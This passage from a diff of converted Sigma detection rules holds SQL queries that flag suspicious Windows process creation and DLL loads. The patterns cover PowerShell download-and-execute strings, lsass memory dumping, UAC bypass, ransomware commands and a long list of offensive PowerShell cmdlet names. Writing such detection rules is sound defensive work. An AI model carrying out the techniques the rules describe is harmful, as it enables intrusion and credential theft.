ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_double_extension_parent.yml" + "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" }, { - "title": "Suspicious New Service Creation", - "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "title": "VMToolsd Suspicious Child Process", + "id": "5687f942-867b-4578-ade7-1e341c46e99a", "status": "experimental", - "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "author": "behops, Bhabesh Raj", + "tags": [ + "attack.execution", "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Legitimate use by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_creation.yml" + "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" }, { - "title": "HackTool - ADCSPwn Execution", - "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", - "status": "test", - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "title": "UAC Bypass via ICMLuaUtil", + "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1557.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" ], - "filename": "proc_creation_win_hktl_adcspwn.yml" + "filename": "proc_creation_win_uac_bypass_icmluautil.yml" }, { - "title": "Rar Usage with Password and Compression Level", - "id": "faa48cae-6b25-4f00-a094-08947fef582f", - "status": "test", - "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", - "author": "@ROxPinTeddy", + "title": "Suspicious PowerShell Download and Execute Pattern", + "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "status": "experimental", + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" + "Software installers that pull packages from remote systems and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rar_compression_with_password.yml" + "filename": "proc_creation_win_powershell_susp_download_patterns.yml" }, { - "title": "HackTool - CrackMapExec PowerShell Obfuscation", - "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "title": "ZxShell Malware", + "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", "status": "test", - "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", - "author": "Thomas Patzke", + "description": "Detects a ZxShell start by the called and well-known function name", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.execution", - "attack.t1059.001", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1027.005" + "attack.t1218.011", + "attack.s0412", + "attack.g0001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" + "filename": "proc_creation_win_apt_zxshell.yml" }, { - "title": "PUA - Ngrok Execution", - "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", - "status": "test", - "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "title": "Process Access via TrolleyExpress Exclusion", + "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "status": "experimental", + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1218.011", + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Another tool that uses the command line switches of Ngrok", - "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (NewProcessName LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" ], - "filename": "proc_creation_win_pua_ngrok.yml" + "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" }, { - "title": "Execution from Suspicious Folder", - "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", + "id": "8cde342c-ba48-4b74-b615-172c330f2e93", "status": "experimental", - "description": "Detects a suspicious execution from an uncommon folder", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.credential_access", "attack.defense_evasion", - "attack.t1036" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_path.yml" + "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" }, { - "title": "Process Access via TrolleyExpress Exclusion", - "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "title": "Pingback Backdoor DLL Loading Activity", + "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", "status": "experimental", - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" + "filename": "image_load_malware_pingback_backdoor.yml" }, { - "title": "Potential Conti Ransomware Activity", - "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "title": "Possible Process Hollowing Image Loading", + "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", "status": "test", - "description": "Detects a specific command used by the Conti ransomware group", - "author": "frack113", + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", + "author": "Markus Neis", "tags": [ - "attack.impact", - "attack.s0575", - "attack.t1486" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Very likely, needs more tuning" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" + "filename": "image_load_susp_uncommon_image_load.yml" }, { - "title": "Proxy Execution via Wuauclt", - "id": "af77cf95-c469-471c-b6a0-946c685c4798", + "title": "DotNet CLR DLL Loaded By Scripting Applications", + "id": "4508a70e-97ef-4300-b62b-ff27992990ea", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", + "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", + "author": "omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_wuauclt.yml" + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" }, { - "title": "PUA - RunXCmd Execution", - "id": "93199800-b52a-4dec-b762-75212c196542", + "title": "PCRE.NET Package Image Load", + "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", "status": "test", - "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects processes loading modules related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1059" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" ], - "filename": "proc_creation_win_pua_runxcmd.yml" + "filename": "image_load_pcre_net_load.yml" }, { - "title": "Malicious PowerShell Commandlets - ProcessCreation", - "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", - "status": "experimental", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wmiprvse Wbemcomn DLL Hijack", + "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "status": "test", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE 